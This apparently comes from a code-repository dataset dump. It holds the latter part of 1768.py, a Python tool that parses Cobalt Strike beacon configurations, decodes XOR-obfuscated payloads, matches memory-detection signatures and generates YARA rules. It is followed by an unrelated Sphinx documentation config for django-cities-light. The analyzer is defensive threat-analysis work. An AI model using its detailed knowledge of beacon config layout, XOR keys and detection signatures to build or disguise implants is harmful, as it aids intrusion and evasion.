0x000b: 'Malleable_C2_Instructions', #
0x000c: 'http_get_header',
0x000d: 'http_post_header',
0x000e: 'SpawnTo', #
0x000f: 'pipename',
0x0010: 'killdate_year', #
0x0011: 'killdate_month', #
0x0012: 'killdate_day', #
0x0013: 'DNS_Idle', #
0x0014: 'DNS_Sleep', #
0x0015: 'SSH_HOST', #
0x0016: 'SSH_PORT', #
0x0017: 'SSH_USER-NAME', #
0x0018: 'SSH_PASSWORD', #
0x0019: 'SSH_PUBKEY', #
0x001a: 'get-verb',
0x001b: 'post-verb',
0x001c: 'HttpPostChunk', #
0x001d: 'spawnto_x86',
0x001e: 'spawnto_x64',
0x001f: 'CryptoScheme', #
0x0020: 'proxy',
0x0021: 'proxy_username',
0x0022: 'proxy_password',
0x0023: 'proxy_type',
0x0024: 'deprecated', #
0x0025: 'license-id',
0x0026: 'bStageCleanup', #
0x0027: 'bCFGCaution', #
0x0028: 'killdate',
0x0029: 'textSectionEnd', #
0x002a: 'ObfuscateSectionsInfo', #
0x002b: 'process-inject-start-rwx',
0x002c: 'process-inject-use-rwx',
0x002d: 'process-inject-min_alloc',
0x002e: 'process-inject-transform-x86',
0x002f: 'process-inject-transform-x64',
0x0030: 'DEPRECATED_PROCINJ_ALLOWED',
0x0031: 'BIND_HOST',
0x0032: 'UsesCookies',
0x0033: 'process-inject-execute',
0x0034: 'process-inject-allocation-method',
0x0035: 'process-inject-stub',
0x0036: 'HostHeader',
0x0037: 'EXIT_FUNK',
0x0038: 'SSH_BANNER',
0x0039: 'SMB_FRAME_HEADER',
0x003a: 'TCP_FRAME_HEADER',
0x003b: 'HEADERS_TO_REMOVE',
0x003c: 'DNS_beacon',
0x003d: 'DNS_A',
0x003e: 'DNS_AAAA',
0x003f: 'DNS_TXT',
0x0040: 'DNS_metadata',
0x0041: 'DNS_output',
0x0042: 'DNS_resolver',
0x0043: 'DNS_STRATEGY',
0x0044: 'DNS_STRATEGY_ROTATE_SECONDS',
0x0045: 'DNS_STRATEGY_FAIL_X',
0x0046: 'DNS_STRATEGY_FAIL_SECONDS',
0x0047: 'MAX_RETRY_STRATEGY_ATTEMPTS',
0x0048: 'MAX_RETRY_STRATEGY_INCREASE',
0x0049: 'MAX_RETRY_STRATEGY_DURATION',
}
dConfigValueInterpreter = {
0x0001: lambda value: LookupConfigValue(0x0001, value),
0x0007: ToHexadecimal,
0x000b: DecodeMalleableC2Instructions,
0x0013: ConvertIntToIPv4,
0x0023: lambda value: LookupConfigValue(0x0023, value),
0x002b: lambda value: LookupConfigValue(0x002b, value),
0x002c: lambda value: LookupConfigValue(0x002b, value),
}
dJSONData = GetJSONData()
dLookupValues = dJSONData.get('dLookupValues', {})
while len(data) >= 2:
formatNumber = '>H'
formatTypeLength = '>HH'
ntlBytes = data[0:struct.calcsize(formatNumber) + struct.calcsize(formatTypeLength)]
try:
number, data = Unpack(formatNumber, data)
except UnpackErrorNotEnoughData:
break
if number == 0:
result.append('0x%04x' % number)
break
try:
type, length, data = Unpack(formatTypeLength, data)
except UnpackErrorNotEnoughData:
break
parameter, data = GetChunk(length, data)
info = ''
rawvalue = None
if type == 1 and length == 2:
identifier = struct.unpack('>H', parameter)[0]
rawvalue = identifier
info = InterpretValue('%d' % identifier, number, identifier, dConfigValueInterpreter)
elif type == 2 and length == 4:
if number in [0x44, 0x45, 0x46]:
rawvalue = struct.unpack('>i', parameter)[0]
else:
rawvalue = struct.unpack('>I', parameter)[0]
value = '%d' % rawvalue
info = InterpretValue(value, number, parameter[0:4], dConfigValueInterpreter)
info += LookupValue(str(number), value, dLookupValues, options.verbose)
elif type == 3 and not number in [0x0b, 0x0c, 0x0d]:
info = InterpretValue('', number, parameter, dConfigValueInterpreter)
rawvalue = binascii.b2a_hex(parameter).decode()
if info == '':
info = Represent(C2SIP3(parameter))
info += LookupValue(str(number), rawvalue, dLookupValues, options.verbose)
resultNumber = '0x%04x' % number
resultType = '0x%04x' % type
resultLength = '0x%04x' % length
resultID = dConfigIdentifiers.get(number, '')
dJSON[number] = {'id': resultID, 'type': resultType, 'info': info, 'rawvalue': rawvalue}
if options.csv:
result.append(MakeCSVLine((resultNumber, resultID, resultType, resultLength, info)))
else:
resultID = ('%-' + str(max([len(value) for value in dConfigIdentifiers.values()])) + 's') % resultID
result.append('%s %s %s %s%s' % (resultNumber, resultID, resultType, resultLength, PrefixIfNeeded(info)))
if type == 3 and number in [0x0b, 0x0c, 0x0d]:
instructions, opcodes = DecodeInstructions(parameter, {0x0b: INSTRUCTION_TYPE_MALLEABLE_C2, 0x0c: INSTRUCTION_TYPE_GET, 0x0d: INSTRUCTION_TYPE_POST}[number])
for index, instruction in enumerate(instructions):
if isinstance(instruction, str):
if options.csv:
result.append(MakeCSVLine(('', '', '', '', instruction)))
else:
result.append(' %s' % instruction)
else:
buildOpcodes = ','.join([':'.join(opcode) for opcode in opcodes[index]])
if number in dJSON:
if dJSON[number]['info'] == '':
dJSON[number]['info'] = buildOpcodes
else:
dJSON[number]['info'] += ';' + buildOpcodes
else:
dJSON[number] = {'id': resultID, 'type': resultType, 'info': buildOpcodes, 'rawvalue': binascii.b2a_hex(parameter).decode()}
if options.csv:
result.append(MakeCSVLine(('', '', '', '', '%s:[%s]' % (instruction[0], buildOpcodes))))
else:
result.append(' %s: [%s]' % (instruction[0], buildOpcodes))
for buildStep in instruction[1:]:
if options.csv:
result.append(MakeCSVLine(('', '', '', '', buildStep)))
else:
result.append(' %s' % buildStep)
# for string in ExtractStringsASCII(parameter):
# if options.csv:
# result.append(MakeCSVLine(('', '', '', '', string.decode('utf8', 'surrogateescape')), ',', '"'))
# else:
# result.append(' %s' % string.decode('utf8', 'surrogateescape'))
if options.select != '':
select = ParseInteger(options.select)
if number == select:
result.append(' Decoded: %s' % ToHexadecimal(ntlBytes + parameter))
result.append(" 'i'-encoded: %s" % ToHexadecimal(Xor(ntlBytes + parameter, b'i')))
result.append(" '.'-encoded: %s" % ToHexadecimal(Xor(ntlBytes + parameter, b'.')))
result.append('Guessing Cobalt Strike version: %s (max 0x%04x)' % DetermineCSVersionFromConfig(dJSON))
sanityCheck = SanityCheckExtractedConfig(dJSON)
result.append('Sanity check Cobalt Strike config: %s' % ('OK' if sanityCheck else 'NOK'))
if options.sanitycheck and not sanityCheck:
return [[ERROR_SANITY_CHECK], {}]
return [result, dJSON]
def AnalyzeEmbeddedPEFile(payloadsectiondata, oOutput, options):
result, dJSON = AnalyzeEmbeddedPEFileSub(payloadsectiondata, options)
oOutput.JSON(dJSON)
for line in result:
oOutput.Line(line)
def DetectPEFile(data):
if len(data) < 40:
return False
if data[0:2] != b'MZ':
return False
offsetbytes = data[0x3C:0x3C + 4]
if len(offsetbytes) != 4:
return False
offset = struct.unpack('<I', offsetbytes)[0]
if data[offset:offset + 2] != b'PE':
return False
return True
def StripLeadingNOPs(data):
return data.lstrip(b'\x90')
def XORChainSlow(iKey, encodedData):
decodedData = b''
xorkey = iKey
while len(encodedData) >= 4:
encoded = struct.unpack('<I', encodedData[0:4])[0]
decodedData += struct.pack('<I', encoded ^ xorkey)
xorkey = encoded
encodedData = encodedData[4:]
return decodedData
def XORChainFast(iKey, encodedData):
oDATA = DataIO()
xorkey = iKey
index = 0
format = '<I'
formatLength = struct.calcsize(format)
while True:
bytesInteger = encodedData[index:index + formatLength]
if len(bytesInteger) != formatLength:
break
encoded = struct.unpack(format, bytesInteger)[0]
oDATA.write(struct.pack(format, encoded ^ xorkey))
xorkey = encoded
index += formatLength
return oDATA.getvalue()
def XORChain(iKey, encodedData):
fast = XORChainFast(iKey, encodedData)
return fast
slow = XORChainSlow(iKey, encodedData)
if slow != fast:
raise Exception('slow != fast')
return fast
def TryXORChainDecoding(data):
if len(data) < 0x100:
return data, []
formatstring = '<II'
formatLength = struct.calcsize(formatstring)
startLength = 16
for iIter in range(1, 0x1000):
bytesValues = data[iIter:iIter + formatLength + startLength]
if len(bytesValues) != formatLength + startLength:
return data, []
xorKey, xorEncodedLength = struct.unpack(formatstring, bytesValues[:formatLength])
decodedLength = xorKey ^ xorEncodedLength
decodedStart = XORChain(xorKey, bytesValues[formatLength:])
if StripLeadingNOPs(decodedStart)[0:2] == b'MZ':
decodedData = StripLeadingNOPs(XORChain(xorKey, data[iIter + formatLength:iIter + formatLength + decodedLength]))
if DetectPEFile(decodedData):
return decodedData, ['xorkey(chain): 0x%08x' % xorKey, 'length: 0x%08x' % decodedLength]
if b'MZRE' in decodedStart or b'MZAR' in decodedStart:
decodedData = XORChain(xorKey, data[iIter + formatLength:iIter + formatLength + decodedLength])
if START_CONFIG_I in decodedData or START_CONFIG_DOT in decodedData:
return decodedData, ['xorkey(chain): 0x%08x' % xorKey, 'length: 0x%08x' % decodedLength]
return data, []
def TryExtractDecode(data):
if DetectPEFile(data):
return data, []
extracted = StripLeadingNOPs(data)
if DetectPEFile(extracted):
return extracted, ['leading NOPs: 0x%04x' % (len(data) - len(extracted))]
extracted, messages = TryXORChainDecoding(data)
if DetectPEFile(extracted):
return extracted, messages
if START_CONFIG_I in extracted or START_CONFIG_DOT in extracted:
return extracted, messages
return data, []
def TestShellcodeHeuristic(data):
return b'hwini' in data[:0x1000] or b'hws2_' in data[:0x1000] or (data[0:1] == b'\xFC' and len(data) < 0x1000)
def FinalTests(data, options, oOutput):
dSignatures = {
# https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures
'Sleep mask 64-bit 4.2 deobfuscation routine': b'\x4C\x8B\x53\x08\x45\x8B\x0A\x45\x8B\x5A\x04\x4D\x8D\x52\x08\x45\x85\xC9\x75\x05\x45\x85\xDB\x74\x33\x45\x3B\xCB\x73\xE6\x49\x8B\xF9\x4C\x8B\x03',
'Sleep mask 32-bit 4.2 deobfuscation routine': b'\x8B\x46\x04\x8B\x08\x8B\x50\x04\x83\xC0\x08\x89\x55\x08\x89\x45\x0C\x85\xC9\x75\x04\x85\xD2\x74\x23\x3B\xCA\x73\xE6\x8B\x06\x8D\x3C\x08\x33\xD2',
'Public key config entry': b'\x00\x07\x00\x03\x01\x00\x30\x81\x9F\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x01\x05\x00\x03\x81\x8D\x00\x30\x81\x89\x02\x81',
}
for name, signature in dSignatures.items():
xorKeys = [b'\x00']
if name == 'Public key config entry':
xorKeys = [b'\x00', b'\x2e', b'\x69']
if options.xorkeys:
xorKeys = [bytes([iter]) for iter in range(256)]
for xorKey in xorKeys:
signatureXored = Xor(signature, xorKey)
for position in FindAll(data, signatureXored):
stringsInFront = sorted(ExtractStringsASCII(data[position-0x100:position]), key=len, reverse=True)
if len(stringsInFront) > 0:
longestString = ' (LSFIF: %s)' % stringsInFront[0]
else:
longestString = ''
oOutput.Line('%s found: 0x%08x%s%s' % (name, position, IFF(xorKey == b'\x00', '', ' (xorKey %s)' % xorKey), longestString))
if options.verbose:
oOutput.Line(cDump(data[position-0x100:position], ' ', position-0x100).HexAsciiDump(rle=True), eol='')
oOutput.Line(' ... signature ...')
oOutput.Line(cDump(data[position+len(signatureXored):position+len(signatureXored)+0x100], ' ', position+len(signatureXored)).HexAsciiDump(rle=True), eol='')
#a# this is a kludge, to fix later when I have time
def ProcessBinaryFileSub(sectiondata, data, oOutput, options):
payloadType, payloadSize, intxorkey, id2, sectiondata = Unpack('<IIII', sectiondata)
oOutput.Line('payloadType: 0x%08x' % payloadType)
oOutput.Line('payloadSize: 0x%08x' % payloadSize)
oOutput.Line('intxorkey: 0x%08x' % intxorkey)
oOutput.Line('id2: 0x%08x' % id2)
payload = Xor(sectiondata[:payloadSize], struct.pack('<I', intxorkey))
if payloadSize > len(sectiondata):
oOutput.Line('Error: payload size too large: 0x%08x' % payloadSize)
oOutput.Line('.data section size: 0x%08x' % len(sectiondata))
return False
error, payloadsectiondata = GetDataSection(payload)
if error != None:
positionMZ = payload.find(b'MZ')
if positionMZ != 0:
if START_CONFIG_I in sectiondata or START_CONFIG_DOT in sectiondata or options.xorkeys:
AnalyzeEmbeddedPEFile(data, oOutput, options)
elif TestShellcodeHeuristic(payload):
if IdentifyShellcode(payload) == '':
oOutput.Line('Probably found shellcode:')
else:
oOutput.Line('Found shellcode:')
AnalyzeShellcode(payload, oOutput)
oOutput.Line(cDump(payload).HexAsciiDump(rle=False))
elif positionMZ >= 0 and positionMZ < 0x20:
oOutput.Line('MZ header found position %d' % positionMZ)
AnalyzeEmbeddedPEFile(payload[positionMZ:], oOutput, options)
elif len(payload) == 0:
return False
else:
oOutput.Line('MZ header not found, truncated dump:')
oOutput.Line(cDump(payload[:0x1000]).HexAsciiDump(rle=True))
return False
else:
oOutput.Line('Error: embedded PE file error: %s' % error)
return False
else:
AnalyzeEmbeddedPEFile(payloadsectiondata, oOutput, options)
FinalTests(payload, options, oOutput)
return True
def ProcessBinaryFile(filename, content, cutexpression, flag, oOutput, oLogfile, options):
if content == None:
try:
oBinaryFile = cBinaryFile(filename, C2BIP3(options.password), options.noextraction, options.literalfilenames)
except:
oLogfile.LineError('Opening file %s %s' % (filename, repr(sys.exc_info()[1])))
return
oLogfile.Line('Success', 'Opening file %s' % filename)
try:
data = oBinaryFile.read()
except:
oLogfile.LineError('Reading file %s %s' % (filename, repr(sys.exc_info()[1])))
return
data = CutData(data, cutexpression)[0]
oBinaryFile.close()
oOutput.Line('File: %s%s' % (filename, IFF(oBinaryFile.extracted, ' (extracted)', '')))
else:
data = content
oOutput.Line('File: %s' % (filename))
if options.hash:
oOutput.Line('MD5 : %s' % hashlib.md5(data).hexdigest())
oOutput.Line('SHA1 : %s' % hashlib.sha1(data).hexdigest())
oOutput.Line('SHA256: %s' % hashlib.sha256(data).hexdigest())
try:
# ----- Put your data processing code here -----
data, messages = TryExtractDecode(data)
for message in messages:
oOutput.Line(message)
if data[0:2] == b'MZ' and not options.raw:
extracted, messages = GetXorChainSection(data)
if extracted != None:
resultChain, dJSON = AnalyzeEmbeddedPEFileSub(extracted, options)
if resultChain != [ERROR_NO_CONFIG]:
oOutput.JSON(dJSON)
for message in messages:
oOutput.Line(message)
for message in resultChain:
oOutput.Line(message)
FinalTests(extracted, options, oOutput)
else:
extracted = None
if extracted == None:
error, sectiondata = GetDataSection(data)
if error != None:
oOutput.Line('Error: PE file error: %s' % error)
elif len(sectiondata) < 16:
oOutput.Line('Error: section .data too small: %d' % len(sectiondata))
elif ProcessBinaryFileSub(sectiondata, data, oOutput, options):
pass
else:
bytesToSkip = 0x20
oOutput.Line('Skipping %d bytes' % bytesToSkip)
ProcessBinaryFileSub(sectiondata[bytesToSkip:], data, oOutput, options)
FinalTests(data, options, oOutput)
elif TestShellcodeHeuristic(data):
if IdentifyShellcode(data) == '':
oOutput.Line('Probably found shellcode:')
else:
oOutput.Line('Found shellcode:')
AnalyzeShellcode(data, oOutput)
oOutput.Line(cDump(data).HexAsciiDump(rle=False))
FinalTests(data, options, oOutput)
else:
dConfigs = {}
if options.xorkeys:
xorKeys = range(256)
else:
xorKeys = [0x2E, 0x69]
for xorKey in xorKeys:
xorKeyBytes = bytes([xorKey])
startConfigXored = Xor(START_CONFIG, xorKeyBytes)
for position in FindAll(data, startConfigXored):
result, dJSON = AnalyzeEmbeddedPEFileSub2(Xor(data[position:position+0x10000], xorKeyBytes), [], options)
configSha256 = hashlib.sha256(''.join(result).encode()).hexdigest()
if not configSha256 in dConfigs:
dConfigs[configSha256] = True
if result != [ERROR_SANITY_CHECK]:
oOutput.JSON(dJSON)
oOutput.Line('xorkey %s %02x' % (xorKeyBytes, xorKey))
for line in result:
oOutput.Line(line)
FinalTests(data, options, oOutput)
# ----------------------------------------------
except:
oLogfile.LineError('Processing file %s %s' % (filename, repr(sys.exc_info()[1])))
if not options.ignoreprocessingerrors:
raise
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def SpaceEvery2Characters(string):
result = []
while string != '':
result.append(string[0:2])
string = string[2:]
return ' '.join(result)
def ProcessLicenseIDs(oOutput, oLogfile, options):
rule_config = '''rule cs_%s_licenseid {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_config_i = '''rule cs_%s_licenseid_i {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_config_dot = '''rule cs_%s_licenseid_dot {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_shellcode = '''rule cs_%s_licenseid_shellcode {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000
}
'''
rule_shellcode_00 = '''rule cs_%s_licenseid_shellcode_00 {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000
}
'''
rule_shellcode_00_end = '''rule cs_%s_licenseid_shellcode_00_end {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000 and $a at (filesize - 5)
}
'''
for licenseid in options.licenseids.split(','):
result = licenseid.split(':', 1)
if len(result) == 1:
idInteger = ParseInteger(licenseid)
bytes = struct.pack('>I', idInteger)
idName = binascii.b2a_hex(bytes).decode()
else:
idInteger = ParseInteger(result[1])
bytes = struct.pack('>I', idInteger)
idName = result[0]
prefix = b'\x00\x25\x00\x02\x00\x04'
oOutput.Line(rule_config % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(prefix + bytes).decode())))
oOutput.Line(rule_config_i % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(Xor(prefix + bytes, b'i')).decode())))
oOutput.Line(rule_config_dot % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(Xor(prefix + bytes, b'.')).decode())))
oOutput.Line(rule_shellcode % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(bytes).decode())))
oOutput.Line(rule_shellcode_00 % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(b'\x00' + bytes).decode())))
oOutput.Line(rule_shellcode_00_end % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(b'\x00' + bytes).decode())))
class cOutputJSON(object):
def __init__(self, oOutput, options):
self.oOutput = oOutput
self.options = options
self.messages = []
self.filename = ''
self.JSONs = []
def JSON(self, dJSON):
self.JSONs.append(dJSON)
def Line(self, line, eol='\n'):
if self.options.jsonoutput:
self.messages.append(line)
else:
self.oOutput.Line(line, eol)
def Filename(self, filename, index, total):
self.oOutput.Filename(filename, index, total)
self.filename = filename
class cAPIOptions(object):
def __init__(self):
self.csv = False
self.select = ''
self.ignoreprocessingerrors = False
self.raw = False
self.verbose = False
self.hash = False
self.sanitycheck = False
self.xorkeys = False
class cAPIOutput(object):
def __init__(self):
self.messages = []
self.JSONs = []
def JSON(self, dJSON):
self.JSONs.append(dJSON)
def Line(self, line):
self.messages.append(line)
def LineError(self, line):
pass
def APIAnalyze(data):
oOutput = cAPIOutput()
ProcessBinaryFile('', data, ':', '', oOutput, cAPIOutput(), cAPIOptions())
return oOutput.JSONs
def ProcessBinaryFiles(filenames, oLogfile, options):
oOutput = cOutputJSON(InstantiateCOutput(options), options)
index = 0
if options.jsoninput:
items = CheckJSON(sys.stdin.read())
if items == None:
return
for item in items:
oOutput.Filename(item['name'], index, len(items))
index += 1
ProcessBinaryFile(item['name'], item['content'], '', '', oOutput, oLogfile, options)
if options.jsonoutput:
oOutput.oOutput.Line(json.dumps({'filename': oOutput.filename, 'messages': oOutput.messages, 'config': oOutput.JSONs[0]}))
elif options.licenseids != '':
ProcessLicenseIDs(oOutput, oLogfile, options)
else:
for filename, cutexpression, flag in filenames:
oOutput.Filename(filename, index, len(filenames))
index += 1
ProcessBinaryFile(filename, None, cutexpression, flag, oOutput, oLogfile, options)
if options.jsonoutput:
oOutput.oOutput.Line(json.dumps({'filename': oOutput.filename, 'messages': oOutput.messages, 'config': oOutput.JSONs[0]}))
def Main():
moredesc = '''
Source code put in the public domain by Didier Stevens, no Copyright
Use at your own risk
https://DidierStevens.com'''
oParser = optparse.OptionParser(usage='usage: %prog [options] [[@]file|cut-expression|flag-expression ...]\n' + __description__ + moredesc, version='%prog ' + __version__, epilog='This tool also accepts flag arguments (#f#), read the man page (-m) for more info.')
oParser.add_option('-m', '--man', action='store_true', default=False, help='Print manual')
oParser.add_option('-r', '--raw', action='store_true', default=False, help='Search through the file as a binary file, do not parse as a PE file')
oParser.add_option('-s', '--select', default='', help='Field to select')
oParser.add_option('-S', '--sanitycheck', action='store_true', default=False, help='Exclude configs that do not pass sanity check')
oParser.add_option('-o', '--output', type=str, default='', help='Output to file (# supported)')
oParser.add_option('-l', '--licenseids', default='', help='License ID(s)/Watermark(s) to generate YARA rules for')
oParser.add_option('-c', '--csv', action='store_true', default=False, help='Output config in CSV format')
oParser.add_option('-p', '--password', default='infected', help='The ZIP password to be used (default infected)')
oParser.add_option('-n', '--noextraction', action='store_true', default=False, help='Do not extract from archive file')
oParser.add_option('-H', '--hash', action='store_true', default=False, help='Include hashes of file content')
oParser.add_option('-x', '--xorkeys', action='store_true', default=False, help='Try all single byte XOR keys (not only 0x69 and 0x2e)')
oParser.add_option('--literalfilenames', action='store_true', default=False, help='Do not interpret filenames')
oParser.add_option('--recursedir', action='store_true', default=False, help='Recurse directories (wildcards and here files (@...) allowed)')
oParser.add_option('--checkfilenames', action='store_true', default=False, help='Perform check if files exist prior to file processing')
oParser.add_option('-j', '--jsoninput', action='store_true', default=False, help='Consume JSON from stdin')
oParser.add_option('-J', '--jsonoutput', action='store_true', default=False, help='Output JSON')
oParser.add_option('-V', '--verbose', action='store_true', default=False, help='Verbose output')
oParser.add_option('--logfile', type=str, default='', help='Create logfile with given keyword')
oParser.add_option('--logcomment', type=str, default='', help='A string with comments to be included in the log file')
oParser.add_option('--ignoreprocessingerrors', action='store_true', default=False, help='Ignore errors during file processing')
(options, args) = oParser.parse_args()
if options.man:
oParser.print_help()
PrintManual()
return
if len(args) != 0 and options.jsoninput:
print('Error: option -j can not be used with files')
return
oLogfile = cLogfile(options.logfile, options.logcomment)
oExpandFilenameArguments = cExpandFilenameArguments(args, options.literalfilenames, options.recursedir, options.checkfilenames, '#c#', '#f#')
oLogfile.Line('FilesCount', str(len(oExpandFilenameArguments.Filenames())))
oLogfile.Line('Files', repr(oExpandFilenameArguments.Filenames()))
if oExpandFilenameArguments.warning:
PrintError('\nWarning:')
PrintError(oExpandFilenameArguments.message)
oLogfile.Line('Warning', repr(oExpandFilenameArguments.message))
starttime = time.time()
ProcessBinaryFiles(oExpandFilenameArguments.Filenames(), oLogfile, options)
if options.verbose:
print('Duration: %f' % (time.time() - starttime))
if oLogfile.errors > 0:
PrintError('Number of errors: %d' % oLogfile.errors)
oLogfile.Close()
if __name__ == '__main__':
Main()
| [
"[email protected]"
] | |
37f4be96948ac5d8e9f6f8094a2c25c829074819 | 45ee9a6d3ac82043241e96cbf2459e9d3937cd9c | /docs/source/conf.py | b7655eca2423b0fed3ffb8303d889a943a4dc47b | [
"MIT"
] | permissive | ggaughan/django-cities-light | 013f83e870e2f3eaf1ba93e212d83956b8b060a9 | bdd22248c7934d912b8e763360c132da2c794e27 | refs/heads/master | 2021-01-18T00:05:26.502029 | 2013-11-22T20:50:27 | 2013-11-22T20:50:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,421 | py | # -*- coding: utf-8 -*-
#
# django-cities-light documentation build configuration file, created by
# sphinx-quickstart on Sat May 19 19:32:33 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os, sys, os.path
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../../../../lib/python2.7/site-packages/'))
from django.conf import settings
settings.configure()
autoclass_content = "both"
import os
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
intersphinx_mapping = {
'autocompletelight': ('http://django-autocomplete-light.readthedocs.org/en/latest/', None),
}
else:
intersphinx_mapping = {
'autocompletelight': ('file:///home/jpic/env/src/autocomplete-light/docs/build/html/', None),
}
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-cities-light'
copyright = u'2012, James Pic'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.1'
# The full version, including alpha/beta/rc tags.
release = '2.1.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-cities-lightdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-cities-light.tex', u'django-cities-light Documentation',
u'James Pic', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-cities-light', u'django-cities-light Documentation',
[u'James Pic'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-cities-light', u'django-cities-light Documentation',
u'James Pic', 'django-cities-light', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| [
"[email protected]"
] | |
